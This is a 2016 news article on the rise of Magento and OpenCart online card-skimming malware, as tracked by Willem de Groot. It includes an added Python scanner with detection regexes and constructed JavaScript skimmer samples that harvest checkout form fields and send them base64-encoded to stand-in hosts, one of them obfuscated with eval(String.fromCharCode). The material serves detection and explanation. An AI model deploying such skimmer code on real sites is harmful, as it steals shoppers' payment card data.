Online skimming malware is about to become a big problem

Oct 13, 2016 13:30 GMT

Although WordPress remains the most frequently hacked CMS platform, compromising online shopping platforms such as Magento and OpenCart is by far more lucrative for online crooks.

According to Willem de Groot, security analyst for Byte.nl, the number of online shops infected with malware has skyrocketed in the past year, as crooks have found that online skimming offers a larger pool of targets and more anonymity than real-world ATM skimming.

The recent surge in online skimming has fueled a growth in carding sites, which now often sell payment card data stolen via compromised online store payment pages and PoS malware, rather than data acquired from ATM skimmers.

Online skimming has gone up 69% in 10 months

De Groot, who is also one of the people behind MageReport.com, a Magento site security scanner, has been keeping track of online stores infected with malware ever since November 2015, when he first saw an uptick in such cases.

That first scan, covering 255,000 online stores, found skimming malware on 3,501 of them.

A repeat scan in March 2016 found 4,476 infected stores, a 28 percent increase. By September 2016, ten months after the first scan, the count had reached 5,925, up 69 percent from November 2015.

With the recent discovery of the MageCart malware, de Groot repeated his scan once again on October 10 and found 5,911 infected stores. The good news is that the MageCart report got enough webmasters' attention: by October 12 the number had dropped to 5,761, with 334 admins having cleaned up their stores while 170 new stores were infected.

Some high-profile sites are infected

You might be tempted to think that only old and niche websites suffer such infections. That is not the case: de Groot's most recent infection lists include some pretty high-profile sites.

He mentions the online store of Icelandic singer Bjork, the store of Audi South Africa, and the online store of the NRSC (National Republican Senatorial Committee).

Some webmasters don't understand the problem, or just don't care

Cleaning up these stores is not a simple job: updating a platform such as Magento requires a degree of technical skill and is not a one-click operation.

But de Groot doesn't have a problem with the technical side of updating online stores, since all of these platforms document the process well. His problem is with the human factor. The skimmer is JavaScript executing in the shopper's browser on the store's own pages, so it reads card details as they are typed into the store's forms, before HTTPS encrypts them in transit and regardless of which provider ultimately processes the payment. None of the following replies he received from store admins he notified addresses that:

  We don’t care, our payments are handled by a 3rd party payment provider  

  Thanks for your suggestion, but our shop is totally safe. There is just an annoying javascript error.  

  Our shop is safe because we use https  

Online skimming malware is now more complex

And if the ignorance of online store owners weren't enough, de Groot, who has been tracking the different malware families, says the malware's code has grown steadily more sophisticated.

He mentions that in its first variants, the malware, usually a JavaScript file loaded covertly on the store's pages, waited until the shopper reached a page whose URL contained the term "checkout" before capturing anything. Current variants recognise the forms of various checkout and payment extensions and rely on heavy code obfuscation.

Besides getting harder to detect, skimming malware has also multiplied: de Groot says that in under a year it has gone from a single threat to nine variants belonging to three distinct malware families.
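The progression de Groot describes, from a plain script keyed on "checkout" in the URL to obfuscated code that goes straight for the payment form, is exactly what a scanner like MageReport has to keep pace with. The following Python is an added example written for this article; it is not MageReport's code, not Byte.nl's, and none of the samples is a real skimmer. The indicator regexes, the three sample scripts and the host names in them are all constructed. The scan is purely static: it runs plain-text indicators over each script and, before giving up on an obfuscated one, statically unwraps two common encodings (eval(String.fromCharCode(...)) and \x hex escapes) so the same indicators can match the hidden code.

```python
"""Heuristic scanner for online-skimming JavaScript (added example).

Constructed for this article: the indicator list, the sample scripts and the
host names below are made up; nothing here is MageReport's code or a real
skimmer. The scan is static and never executes the script text.
"""
import re

# Indicator groups. Each regex is searched in the script text and in every
# statically decoded layer of it (see decode_layers).
INDICATORS = {
    # First-generation trigger: only act on pages whose URL mentions "checkout".
    "checkout_url_trigger": [
        r"location\.(?:href|pathname)[^;\n]{0,80}(?:indexOf|match|includes|test)\s*\([^)]*checkout",
        r"checkout[^;\n]{0,40}location\.(?:href|pathname)",
    ],
    # Harvesting: serialise a form on submit, or read every input / card field.
    "form_harvest": [
        r"\.serialize\(\)",
        r"querySelectorAll\(\s*['\"]input",
        r"cc_number|card_number|cvv|cc_cid|cc_exp",
    ],
    # Exfiltration: image beacon or XHR/fetch to a remote host, base64 packing.
    "exfiltration": [
        r"new\s+Image\(\)[\s\S]{0,120}\.src\s*=",
        r"(?:XMLHttpRequest|fetch)\b[\s\S]{0,200}https?://",
        r"\bbtoa\(",
    ],
    # Obfuscation primitives typical of the later families.
    "obfuscation": [
        r"\beval\s*\(",
        r"String\.fromCharCode",
        r"\\x[0-9a-fA-F]{2}(?:\\x[0-9a-fA-F]{2}){7,}",  # run of 8+ hex escapes
        r"\b(?:unescape|atob)\(",
    ],
}

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_layers(text):
    """Return [original, after fromCharCode decode, after hex-escape decode],
    keeping only layers that actually changed. String rewriting only."""
    layers = [text]
    decoded = _FROMCHARCODE.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + '"',
        text)
    if decoded != layers[-1]:
        layers.append(decoded)
    unhexed = _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), layers[-1])
    if unhexed != layers[-1]:
        layers.append(unhexed)
    return layers


def scan_script(text):
    """Map each indicator group to the distinct snippets it matched, across all layers."""
    hits = {}
    for layer in decode_layers(text):
        for group, patterns in INDICATORS.items():
            for pattern in patterns:
                for m in re.finditer(pattern, layer):
                    snippet = m.group(0)[:60]
                    if snippet not in hits.setdefault(group, []):
                        hits[group].append(snippet)
    return hits


def is_likely_skimmer(text):
    """Exfiltration alone is also what an analytics beacon looks like, so a
    verdict requires it together with harvesting or checkout targeting."""
    hits = scan_script(text)
    return "exfiltration" in hits and bool(set(hits) & {"form_harvest", "checkout_url_trigger"})


# --- constructed samples (not real code from any store) ----------------------
BENIGN_SAMPLE = """
(function () {
  var img = new Image();
  img.src = 'https://analytics.example/pixel.gif?p=' + encodeURIComponent(location.pathname);
})();
"""

# Early generation: plain text, keyed on "checkout" in the URL.
GEN1_SAMPLE = """
if (location.href.indexOf('checkout') !== -1) {
  document.querySelector('form').addEventListener('submit', function () {
    var data = jQuery('form').serialize();
    new Image().src = 'https://stat-collector.example/i.gif?d=' + btoa(data);
  });
}
"""

# Later generation: reads the inputs directly, hides the scheme behind \x
# escapes, and is wrapped whole in eval(String.fromCharCode(...)).
_GEN2_PLAIN = r"""
var f = document.querySelectorAll('input'), o = {};
for (var i = 0; i < f.length; i++) o[f[i].name] = f[i].value;
var x = new XMLHttpRequest();
x.open('POST', '\x68\x74\x74\x70\x73\x3a\x2f\x2f' + 'cdn-static.example/save.php');
x.send(btoa(JSON.stringify(o)));
"""


def encode_from_char_code(payload):
    """Wrap a script the way the constructed GEN2 sample is wrapped."""
    return "eval(String.fromCharCode(%s))" % ",".join(str(ord(c)) for c in payload)


GEN2_SAMPLE = encode_from_char_code(_GEN2_PLAIN)

if __name__ == "__main__":
    for name, script in [("benign", BENIGN_SAMPLE), ("gen1", GEN1_SAMPLE), ("gen2", GEN2_SAMPLE)]:
        print("%-6s skimmer=%-5s groups=%s" % (name, is_likely_skimmer(script), sorted(scan_script(script))))
```

The benign beacon trips the exfiltration group alone, which is why the verdict is gated on a second group; the first-generation sample is caught by its own plain text, and the wrapped one only after the fromCharCode and hex layers are peeled back, with the obfuscation group recording the wrapping itself. Real deployments would feed this the scripts fetched from a store's checkout pages, and would treat a hit as a reason to look, not as proof.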

Google, Visa, and Mastercard should intervene

"Companies such as Visa or Mastercard could revoke the payment license of sloppy merchants," de Groot proposes. "But it would be way more efficient if Google would add the compromised sites to its Chrome Safe Browsing blacklist. Visitors would be greeted with a fat red warning screen, inducing the store owner to quickly resolve the situation."

De Groot says that he's been sending the Safe Browsing team reports about his findings, but currently only a handful of these sites are blacklisted.

Below is de Groot uncovering a malware infection on the National Republican Senatorial Committee online store.